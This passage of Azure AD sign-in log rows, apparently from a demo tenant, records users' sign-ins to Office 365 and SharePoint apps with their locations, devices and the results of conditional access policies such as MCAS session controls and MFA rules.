'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93ca542e-4eab-45c4-8608-b715042b1200,SigninLogs,Sucess,36.6404686,-78.26995087
+2066,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,40:00.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6f88b617-5360-49c9-8cc5-4fc2e34fadfb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:40,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",34805c5b-6a36-487d-9189-7bc120f41000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,34805c5b-6a36-487d-9189-7bc120f41000,SigninLogs,Sucess,41.90428925,-85.99833679
+2067,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:22.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c4b06619-c349-4e26-aa41-2e7e7ee7db3f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",7ad10e9e-8b94-4b07-9307-1c32e3fc1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,7ad10e9e-8b94-4b07-9307-1c32e3fc1100,SigninLogs,Sucess,41.90428925,-85.99833679
+2068,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:38.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9dfa91f5-fc0d-4fbf-bd7c-91735b2771b8,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",875c831a-2c9c-4e0a-b7c7-b830d7a01100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,875c831a-2c9c-4e0a-b7c7-b830d7a01100,SigninLogs,Sucess,41.90428925,-85.99833679
+2069,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:53.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a40303c6-ee62-4dfb-8f87-1b27cdd93114,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",508b0c76-ee67-4f38-8f76-558a39711200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,508b0c76-ee67-4f38-8f76-558a39711200,SigninLogs,Sucess,33.7984581,-84.38828278
+2070,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:03.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,51ca469f-a07a-0000-470b-274517a53474,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",db359221-fdda-4bf1-8b37-6f4624bb1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,db359221-fdda-4bf1-8b37-6f4624bb1300,SigninLogs,Sucess,41.90428925,-85.99833679
+2071,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:04.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2dde109e-353e-4530-bc51-7d714a451046,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f4c49c86-cb9e-4a04-9dcc-1dcdfc191000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f4c49c86-cb9e-4a04-9dcc-1dcdfc191000,SigninLogs,Sucess,33.7984581,-84.38828278
+2072,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:28.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f832c152-ab40-4112-bb12-0a4d52481ebd,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",189268ff-d871-4dc4-914e-2c96fc001300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,189268ff-d871-4dc4-914e-2c96fc001300,SigninLogs,Sucess,41.90428925,-85.99833679
+2073,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:04.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f2c8469f-706c-0000-5d33-f3378c87fde7,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",cbffb959-9fbe-4abe-95ed-0d85414a1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan 